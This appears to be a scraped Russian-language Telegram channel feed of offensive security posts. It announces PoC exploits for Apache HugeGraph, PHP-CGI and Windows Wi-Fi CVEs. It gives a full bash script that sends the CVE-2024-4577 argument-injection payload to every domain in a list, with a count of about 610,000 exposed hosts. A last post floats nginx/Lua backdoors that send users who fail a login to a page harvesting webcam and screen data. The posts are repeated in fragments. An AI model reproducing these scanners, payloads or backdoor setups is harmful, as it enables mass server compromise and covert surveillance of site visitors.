CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
*
POC exploit
#apache #rce
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"*
POC exploit
#apache #rce
🔥10
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда
*
fofa link (610,604 хостов)
#php #xamp
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда
PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.*
fofa link (610,604 хостов)
#php #xamp
👍14
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
*
Сохраняйте скрипт и по списку доменов:
#php #xamp
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)
if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}
# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi
# Call the main function with the domain list file
main "$1"*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_noscript.sh /path/to/domains-list#php #xamp
🔥12
CVE-2024-30078 win RCE wi-fi
*
New Wi-Fi Takeover Attack—All Windows Users
*
И Вроде сплоит какой то странный, но зачем тогда репу удалять ? ))
#win #rce
*
New Wi-Fi Takeover Attack—All Windows Users
*
И Вроде сплоит какой то странный, но зачем тогда репу удалять ? ))
#win #rce
Forbes
New Wi-Fi Takeover Attack—All Windows Users Warned To Update Now
Microsoft has released a critical security update for users of all supported Windows versions as a new Wi-Fi compromise requiring no authentication has been confirmed.
🔥12👍3
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на
Ну то есть если логин\пароль верный - отправило на правильный сайт.
логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.
Добрый гугл сказать соединить
После слова Lua я про первую мысль как то подзабыл.
Варианта три:
1 - собрать руками джинс + луа
2 - докер
3 -
Сам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.
Как минимум можно получать
Оказвается нормальные пацаны уже сделали, гит ломится от решений.
Почитайте короткую статейку )
Backdooring OpenResty Servers
#ЯбудуЗватьТебяЛУ #nginx
http basic authentication (который на nginx).Ну то есть если логин\пароль верный - отправило на правильный сайт.
логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.
Добрый гугл сказать соединить
nginx + LUA. После слова Lua я про первую мысль как то подзабыл.
Варианта три:
1 - собрать руками джинс + луа
2 - докер
3 -
OpenRestyСам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.
Как минимум можно получать
webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cliОказвается нормальные пацаны уже сделали, гит ломится от решений.
Почитайте короткую статейку )
Backdooring OpenResty Servers
#ЯбудуЗватьТебяЛУ #nginx
🔥14👍3